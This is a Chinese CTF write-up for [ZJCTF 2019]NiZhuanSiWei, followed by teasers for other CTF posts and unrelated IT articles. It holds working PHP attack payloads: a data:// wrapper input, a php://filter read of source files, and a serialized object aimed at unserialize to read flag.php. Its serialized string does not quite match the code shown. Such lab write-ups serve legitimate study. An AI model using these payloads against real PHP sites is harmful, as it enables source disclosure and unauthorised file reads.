[ZJCTF 2019]NiZhuanSiWei

时间：2023-10-09 15:15:51浏览次数：43

标签：password ZJCTF text echo NiZhuanSiWei flag 2019 file php

原理

反序列话
伪协议data和filter

解题过程

进入靶场看到源码

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

粗略分析下，要传递三个参数值,text,file,password，其中，读取text参数值的内容与welcome to the zjctf一致
接下来file参数值不能含有flag，接着文件包含file参数值，并对password进行反序列化

先用data伪协议绕过text

data:text/plain,welcome to the zjctf
或者data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

之后提示了useless.php，刚好我们需要password序列化对象的类的结构，肯定要知道useless.php的源码，但是访问了也没啥东西啊
试试用filter伪协议读取

payload:file=php://filter/read=convert.base64-encode/resource=useless.php

成功拿到base64编码值，解码后为
<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

第一个源码有 echo $password,也就会调用__tostring，提示我们传入$file=flag.php

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
} 
$a=new Flag();
$a->file='flag.php';
echo serialize($a);
打印出序列化值为：O:4:"Flag":1:{s:4:"file";s:9:"/flag.php";}

在页面原代码找到flag

参考文章：https://blog.csdn.net/li2254477890/article/details/121151365
反序列化文章：https://blog.csdn.net/weixin_39927214/article/details/116281659

标签：password,ZJCTF,text,echo,NiZhuanSiWei,flag,2019,file,php
From： https://www.cnblogs.com/BEONTHE/p/17751768.html

[极客大挑战 2019]BuyFlag
原理弱比较问题科学计数法绕过cookie字段的修改解题过程进入靶场，页面没什么提示，就先看下原代码吧看到有两个超链接，现在这个页面是index.php，看一下flag.php有这几个提示，要满足两个条件咯，再看下原代码发现有后端源码，也就是说要传入password和money，这里的源码需要password......
[RoarCTF 2019]Easy Calc
原理PHP的字符串解析特性利用scandir()列出目录和文件使用chr()来替代字符file_get_contents读取并输出文件内容解题过程进入靶场，看到一个表达式，要计算，那就简单1+1吧没啥特别的，url地址也没变化，就看看页面源代码。看到说是用了waf，传递参数给calc.php，参数为num试试访问ca......
[极客大挑战 2019]PHP
原理解题过程查看原代码没啥提示，看到有备份网站常见的备份文件后缀名：.git.svn.swp.~.bak.bash_history尝试是否存在index.php的备份。如index.php.bak，又或者www.zip等等，如果没找到就只能用目录扫描工具了下载www.zip压缩包，得到原代码需要我们传递select然后反序列......
[极客大挑战 2019]BabySQL
原理sql关键字绕过姿势之双写绕过解题过程BabySQL嘛，看到登录框，先试试or万能登录发现sql语句报错了，把我or给吃了，可以看到这种过滤是直接把or关键字替换成了空字符串那我们可以试试双写绕过可以了，我们得到了账号密码，有啥用？？我起初还想着将这密码解密呢--，浪费时间，继续用常规......
[极客大挑战 2019]Upload
原理文件上传MIME和文件头的检测php的多种后缀木马连接解题过程进入靶场，应该就是上传漏洞然后连接木马即可。先上传个正常文件名的文件然后抓包，我上传个正常jpg文件还冤枉我？？先把文件内容删了。MIME信息和文件头信息换换换成png还是不行，试试gif格式终于可以了--，现在给......
[极客大挑战 2019]Http 1
原理来源页的修改ip修改浏览器修改解题过程一看题目涉及到抓包咯，进入靶场界面没啥东西，查看原代码发现一个文件，拼在url地址后面发现要修改来源页，那就抓包吧补上来源还要修改浏览器还要本地访问--得到flag......
VS2019 创建Integration Service
最近工作中需要用到Integrationservice，使用VS2022如何都打不开，查阅文档发现vs2022目前不支持，所以需要下载VS2019，安装步骤如下1、下载vs20192、在此窗口中，我们单击“扩展”>“管理扩展”： 3、在打开的窗口的搜索栏中，搜索“IntegrationServices”扩展名。从出现的列表中，我们......
【VMware篇】6-Esxi上Windows server 2019安装AD域控、DHCP、DNS、KMS
第1章前言本文主要介绍在Windowsserver2019上安装AD域控、DHCP、DNS、KMS服务器以及创建好域控后组织单元的创建。AD（activedirectory）域 AD域是一种广泛使用的身份验证和访问控制解决方案，它是由Microsoft开发的。AD域能够为组织中的用户、计算机和其他网络资源提供......
WIN11 安装 SQL Server 2019，SQLSERVER2022， MYSQL 8.0 ，Docker，Mongodb失败故障分析
最近研究数据库性能调优遇到各种数据库各种装不上，不知道熬了多少根软白沙，熬了多少颗张三疯，问了多少AI，查了多少网页，熬了两天，终于搞明白了一件事：那就是WIN11ONARM（因为拿的是MACPROM2做.NET平台开发安装）SQLSERVER2019，SQLSERVER2022，MYSQL8.0，Docker，Mongodb失败故障分析，最终极......
升级Lync Server 2013到Skype for Business 2019（二）
写在前面从本章开始，将进入到整个LyncServer2013升级到SkypeforBusiness2019升级项目的详细实施部分。本章将介绍SkypeforBusiness2019前端服务器安装。前端服务器安装先决条件安装打开WindowsPowerShell。确保已插入WindowsServer2019安装介质。运行以下命令Add-Window......

[ZJCTF 2019]NiZhuanSiWei

原理

解题过程

相关文章

赞助商

阅读排行